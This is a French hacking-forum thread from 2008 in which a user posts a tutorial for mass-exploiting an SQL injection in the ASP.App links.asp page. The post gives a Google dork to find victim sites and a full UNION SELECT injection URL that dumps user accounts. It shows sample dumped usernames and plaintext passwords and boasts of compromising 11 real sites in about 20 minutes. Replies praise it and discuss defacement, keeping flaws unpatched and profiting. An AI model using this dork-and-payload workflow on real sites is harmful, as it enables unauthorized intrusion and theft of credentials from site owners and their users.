[EXPLOIT] ASPapp -links.asp (CatId) SQL Injection Vuln

Moderator: Mod

Avez-vous aime ce mini-tuto ecrit en vitesse ?

Oui
9
82%
Non
0
No votes
Bof !!
2
18%
 
Total votes : 11

[EXPLOIT] ASPapp -links.asp (CatId) SQL Injection Vuln

Postby CyberCore » Wed Mar 19, 2008 8:16 pm

[size=18:c3fc6fd65c][b:c3fc6fd65c]1] Trouver un exploit[/b:c3fc6fd65c][/size:c3fc6fd65c]

Il est 07:00 du matin. Vous vous penchez par la fenetre et vous pouvez voir la farendole des grands-pere partir pour le bureau de tabac pour acheter le journal. De ce fait, les vieux de la vieille, sont toujours au courant de tout ! Une fois qu'ils ont fini de lire le journal ils vont marcher, c'est bon pour le coeur et la circulation qu'ils disent !

Moi il est 10:00, et a 07:00 je ne suis pas allez voir le spectacle qui se trame dehors ! Je vais sur www.milw0rm.com lire le journal des failles et exploits informatique. Et de ce fait, je suis toujours au courant de tout ! Une fois que j'ai fini de lire les nouveaux exploits decouverts, je vais faire du sport : c'est bon pour garder un bon mental !

Ce jour, sur Milw0rm, je fit une decouverte incroyable. Comme on en trouve pas chaques jours ! Je dirais qu'une fois par mois c'est tres largement enorme meme.

La faille en question se situe sur un programme ASP du nom de ASP.App (original...) au niveau de la page links.asp et ce via l'argument CatId.

Voici la news en question : [url]http://www.milw0rm.com/exploits/5276[/url]


[size=18:c3fc6fd65c][b:c3fc6fd65c]2] Trouver une cible[/b:c3fc6fd65c][/size:c3fc6fd65c]

Autant les renseignements generaux n'ont qu'a clique sur un bouton pour tout savoir de vous... Autant nous feront pareil, enfin presque.

Google est un moteur de recherche avec un robot... Le robot va partout ou il peut a partir du moment ou on ne lui dit pas de ne pas y aller ! De ce fait via Google vous pouvez trouver des repertoires admin/passwd.txt tres largement accessible ! :)

Mais Google dispose aussi d'un grand nombre de Hacks ou de Tricks & Tips ! Ou de Tools ! En fait on appel ca des Dorks....

Le Dorks que j'ai employe pour trouver mes cibles etait : [b:c3fc6fd65c]inurl:"links.asp?CatId"[/b:c3fc6fd65c]

Donc vous allez sur www.google.ru .... Ah niania je veux pas Google en Russe ! Rhalala..... Vous serez redirigez vers le Gogole de votre pays ! Ensuite dans le champs de recherche vous inserez le Dork... Puis vous cliquez sur recherche ou vous appuyez sur entrer (plus rapide).


[size=18:c3fc6fd65c][b:c3fc6fd65c]3] Exploiter avec l'Exploit[/b:c3fc6fd65c][/size:c3fc6fd65c]

A partir de la Google va vous afficher tous les sites qui comporteront dans leurs url "links.asp?CatId"....

Tous ces sites nous interessent puisqu'ils possedent la page vulnerable ! Cela dit, ce n'est pas pour autant que tous ces vulnerable ! ;) Rappelez-vous ASP.App l'est (c'est un forum en ASP hyper merdique...). Bon Ok, j'aime pas l'ASP mais vraiment c'est un forum tres mal fait ! Donc il ne merite que ce qu'il merite... Puis vue le nom original....

Donc on va prendre l'url d'un site au hasard :

[b:c3fc6fd65c]http://SITE/links.asp?CatId=86[/b:c3fc6fd65c]

Auquel on va lui greffer l'Injection SQL !

[b:c3fc6fd65c]http://SITE/links.asp?CatId=-99999%20UNION%20SELECT%20null,accesslevel,null,null,
user_name,%205%20,password,null%20FROM%20Users[/b:c3fc6fd65c]

Si le site n'est pas vulnerable il ne se passera rien ou vous aurez tout simplement une erreure (OBDE ou autre). Dans ce cas passez votre chemin !

En revanche si le site est vulnerable vous aurez la liste de tous les comptes du site en question avec leurs mots de passes respectifs affiche en clair.

Vous obtiendrez quelque chose comme cela :

[i:c3fc6fd65c]Links ??? Ahmed ??? sjopbtkz ??? 1
Links ??? Ali ??? qisfsgzr ??? 1
Links ??? Andrei ??? jtfjpbfu ??? 1
Links ??? Boobs ??? vzoysyzl ??? 1
Links ??? Capone ??? kdpelepe ??? 1
Links ??? craig.pinion ??? nozone22 ??? 1
Links ??? Ivan ??? gxdbhuim ??? 1
Links ??? kristybent ??? chloe ??? 1
Links ??? Mamadshah ??? zijyhiqi ??? 1
Links ??? Master ??? ozlicwgb ??? 1
Links ??? Nick ??? tcrufxwa ??? 1
Links ??? Rock ??? ywwympvp ??? 1
Links ??? editor ??? editor ??? 2
Links ??? manager ??? manager ??? 2
Links ??? admin ??? admin ??? 3[/i:c3fc6fd65c]

Decryptons ca....

Les utilisateurs normaux ont le status 1. C'est a dire un droit de poster de lire et de voir les forums biensur...

Les moderateurs ont le status 2...

Et l'administrateur a le status 3 !!!

Le compte qui nous interesse donc est bien entendu le compte qui aura "le plus grand chiffre" ! Il se trouve toujours en bas de la liste (ordre croissant d'affichage -> a moins de modifier l'injection).

Ici nous pouvons voir admin>admin ... Login admin Mot de passe admin. C'est super securise vous avez vue ? Raison de plus pour s'introduire dans ce forum ayant un nom tres original etant fait en asp etant pas beau et ayant des utilisateurs administrateurs qui ont pour login et mot de passe le meme mot !


[size=18:c3fc6fd65c][b:c3fc6fd65c]4] Etre anonyme[/b:c3fc6fd65c][/size:c3fc6fd65c]

Une chose importante c'est d'etre anonyme au maximum... C'est a dire passer par un proxy, bloquer son http refferer, desactiver javascript et java... Malheureusement pour ce genre d'exploit les cookies doivent absolument etre active !

Je prepare un article sur l'anonymat, patientez un peu ! ;)


[size=18:c3fc6fd65c][b:c3fc6fd65c]5] Combien de site ai-je compromis ?[/b:c3fc6fd65c][/size:c3fc6fd65c]

Vous rigolez ? Je ne vais quand meme pas citer la liste des sites ! :)

Mais pour vous donner une idee j'en ai compromis 11 en l'espace de 15 a 20min.
User avatar
CyberCore
Projets
 
Posts: 7
Joined: Wed Mar 19, 2008 7:31 pm

Postby kmkz » Wed Mar 19, 2008 8:31 pm

^^
Des sites compromis c'est KEWWL ! WA !



Mais sérieusement , pour le prochain , code TON exploit , c'est quand meme plus valorisant ...
Ceci dit , ça servira a certain qui ne savent pas encore se servir des sploit de milw0rm ....et oui , ça existe encore ces betes la..!
Cependant , c'est pas parcequ'on va faire du mass-défacing qu'on sera reconnu ou quoi que ce soit , tenez-vous le pour dit et...enjoy ! ;)

(sans rancune ) :wink:
User avatar
kmkz
Projets
 
Posts: 120
Joined: Wed Feb 06, 2008 1:25 pm
Location: Carcassonne, Toulouse

Postby CyberCore » Thu Mar 20, 2008 12:39 am

Nous n'avons pas eu le temps de parler ensemble kmkz... Il n'y a donc pas de rancune.

Des 11 sites compromis que j'ai reference je n'en ai deface aucun. (Ce n'est pas cela qui m'interesse).


Pour me proteger d'un eventuel "Lamerz inside", c'est Korigan qui m'a propose de faire un post sur le forum afin d'aider les debutants et de leurs montrer que le chemin est peut etre long mais il est faisable. Mais surtout comprendre ce qu'est un exploit et comment le mettre en pratique. Chose qui n'est pas evidente, car l'exploit est du niveau superieur aux bases...


Sinon pour faire un peu connaissance avec l'engin qu'est CyberCore, je ne trouve aucune satisfaction a utiliser l'exploit d'un autre. Hormis beaucoup de connaissance sur la facon de coder et sur la facon de faire des differentes personnes. Cependant cela peut me faire gagner enormement de temps dans certains cas, je le rappel j'ai un but et certains le connaisse. Mais je ne cherche pas a detruire ! :)

Maintenant je ne partage pas les failles que je trouves sauf avec des gens qui me sont proche et en qui j'ai confiance. Ou avec qui j'ai vraiment bien sympathise ! :)

Je preferes que la faille soit exploitable un bon moment par une minorite plutot que la voir se faire patcher 1h apres sa publication. Ou voir tous les sites deface apres publication.

Puis mes buts sur le plan de la securite informatique sont au dessus que d'etre admin sur un forum.


Sur ce, je ferai peut etre d'autres tutos sur des failles que je provoqueraient moi meme dans des codes bien precis. Le travail que Korigan fait avec son systeme de faille qui tourne m'a rendu bouche bé. Je trouve cela super et j'aimerais savoir le faire. J'essayerais donc de trouver le temps.


Bonne soiree :)
User avatar
CyberCore
Projets
 
Posts: 7
Joined: Wed Mar 19, 2008 7:31 pm

Postby Fireburn » Thu Mar 20, 2008 9:26 am

ça fesait longtemps que j'avais pas vue un petit bijou pareil. Encore merci pour cette explication claire et précise qui permet a tout a chacun de vérifier. Encore heureux que tous les sites ne soient pas vulnérable même si après un jolie petit tests sur Google nombreux sont ceux ou ça passe.
User avatar
Fireburn
Projets
 
Posts: 377
Joined: Tue Mar 18, 2008 5:17 pm
Location: Sur la toile en haut a droite

Postby kmkz » Thu Mar 20, 2008 11:08 am

[quote:62d569a5fc]Des 11 sites compromis que j'ai reference je n'en ai deface aucun. (Ce n'est pas cela qui m'interesse).
[/quote:62d569a5fc]

Je ne pensai pas forcément a toi , mais a certain qui , en l'utilisant se prendrai au sérieux alors que c'est plutot lamentable de défacer gratuitement un site .
Comprenez qu'ici , le meilleur sera celui qui aura codé (ou trouver comment exploiter) le sploit et non celui qui s'en servira.
[quote:62d569a5fc]Maintenant je ne partage pas les failles que je trouves sauf avec des gens qui me sont proche et en qui j'ai confiance. Ou avec qui j'ai vraiment bien sympathise ! Smile [/quote:62d569a5fc]
La dessu , on est identique ^^ , c'est tout a ton honneur.
[quote:62d569a5fc] mes buts sur le plan de la securite informatique sont au dessus que d'etre admin sur un forum.
[/quote:62d569a5fc]+1

Enfin voila , mon post était un peu agressif , mais je voulai juste évité un "festival" de la part de certains lamerz en quete de reconnaissances, rien de plus.
A bientot !
User avatar
kmkz
Projets
 
Posts: 120
Joined: Wed Feb 06, 2008 1:25 pm
Location: Carcassonne, Toulouse

Postby Manu404 » Thu Mar 20, 2008 12:16 pm

Pour ma part bof simplment parce que je n'ai rein appirs de nouveaux, mais ceux qui debutent c'est pas mal.
Good work quand même :wink:
User avatar
Manu404
 
Posts: 2219
Joined: Tue Feb 26, 2008 3:44 pm
Location: ::1:

Postby baltazare » Tue Mar 25, 2008 8:54 pm

regardez moi ces forums pourri qui sont vulnerable^^
et là plupart sont deja patcher jusqu'a l'os ;)

bien trouver mais sa ne sert pas vraiment, faut que sa rapporte du pez par un moyen ;)
User avatar
baltazare
 
Posts: 607
Joined: Mon Sep 03, 2007 10:27 am


Return to Sécurité Intrusion

Who is online

Users browsing this forum: No registered users and 0 guests

cron